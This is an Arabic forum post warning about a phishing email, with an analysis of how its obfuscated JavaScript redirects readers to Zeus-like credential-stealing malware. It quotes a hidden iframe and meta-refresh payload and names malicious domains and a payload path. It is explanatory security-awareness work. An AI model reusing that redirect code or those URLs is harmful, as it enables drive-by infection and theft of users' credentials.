مساحة اعلانات نصية ذهبية |
||
اعلن هنا | اعلن هنا | اعلن هنا |
|
|
|
|
أدوات الموضوع | انواع عرض الموضوع |
#1
|
|||
|
|||
وجب الحذر..تحليل أمني لطريقة الاختراق عن طريق البريد الالكتروني
السلام عليكم و رحمة الله و بركاته رمز PHP:اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها رمز PHP:الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة لأعرف محتواها فوجدت كود جافا سكربت التالي: رمز PHP:كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة بعد فك التشفير حصلت على التالي: رمز PHP:يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم نقوم بتعديل المستند .write عن طريق Alert لنشاهد الكود الذي يتم تحصيله هذا هو الكود:اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة الصفحة تحتوي على الكود التالي: PLEASE WAITING.... 4 SECONDS <iframe width="0" height="0" src="http://finwizonline.com/news/"></iframe> <meta http-equiv="refresh" content="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" /> [CENTER][/CENTER] لدينا iframe أول يقوم بتحويلنا الى صفحة فارغة لا يوجد بها اي نص (http://finwizonline.com/news/) ثم بعد 4 ثواني يقوم المتصفح بتحويلنا تلقائيا الى رابط جديد http://xxxvideo-eyyc.cz.cc/video7/?afid=24 قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس) تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت الفايروس موجود على المسار التالي /news/exe.exe قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي: http://www.virustotal.com/file-scan/report.htm 7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec) نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية: http://www.virustotal.com/file-scan/report.html فقط 20 برنامج حماية اكتشف الفايروس الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح الفايروس يبدو و كانه فايروس زيوس المعروف الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان… مصدر هنا |
#2
|
|||
|
|||
رد: وجب الحذر..تحليل أمني لطريقة الاختراق عن طريق البريد الالكتروني
يعطيك العافية اخوي الفارس على التحذير
أدامك الله ورعاك |
pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
موثوق البريد السعودي mothoq .. رابط استعلام خدمة البريد الالكتروني للمتاجر السعودية موثوق | الســــاطي | سبق - إشراق سبق - عاجل | 0 | 03-17-2017 08:21 PM |
البريد الالكتروني | اشراق العالمrss | اشراق شامل - منوعات | 0 | 08-01-2013 05:50 AM |
تحميل برنامج رد علي رسائل البريد الالكتروني بضغطت زر | اشراق العالمrss | اشراق شامل - منوعات | 0 | 04-12-2013 10:40 PM |
ممكن شرح لطريقة الاختراق برابط فقط | rss | اشراق شامل - منوعات | 0 | 08-05-2012 10:41 AM |
شرح تفعيل العضوية عن طريق البريد الالكتروني | mughader | مدرسة إشراق - شروحات حصرية | 0 | 06-29-2010 05:52 AM |
شراء روابط نصية | |
راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
روابط نصية AAXA |
عسل النحل |
روابط نصية AA1A | |||||
كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
روابط نصية2 M4U | ||||
متجر كي ستور | شدات ببجي اقساط | بطاقات قوقل بلاي | بطاقات ايتونز | اكواد شدات ببجي |
روابط نصية AAZ | ||
متجر الرياض | شدات ببجي | شحن شدات ببجي |
روابط نصية KSM | |||||||
خصومات | هدايا وكوبونات | توفير المال | مال واستثمار | صفقات وتسوق | عروض اسواق السعودية | تحسين مالي | كوبونات |
روابط نصية AN | ||||
يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
روابط نصية M11 | |||||||
كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
روابط نصية AWA | ||||
كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |
روابط نصية AA3A | ||||
تقييم شركة exness | تقييم شركة binance | تقييم شركة avatrade | تقييم شركة evest | افضل شركات التداول |
روابط نصية S22 | ||||
تشليح السيارات بالرياض | شراء سيارات تشليح بالرياض | تشليح | تشليح الحاير | تشليح السلى |
موقع شراء سيارات تشليح | شراء سيارات تشليح | تشليح السيارات | قطع غيار تشليح | تشاليح |
روابط نصية AAPA | ||||
دراما كافيه | دراما صح | اهواك Tv | فوستا | شبكتي Tv |
Syria liv | مساحة إعلانيه |
روابط نصية AA25 | ||
عبادي الخليج | شدات ببجي | شدات ببجي تمارا |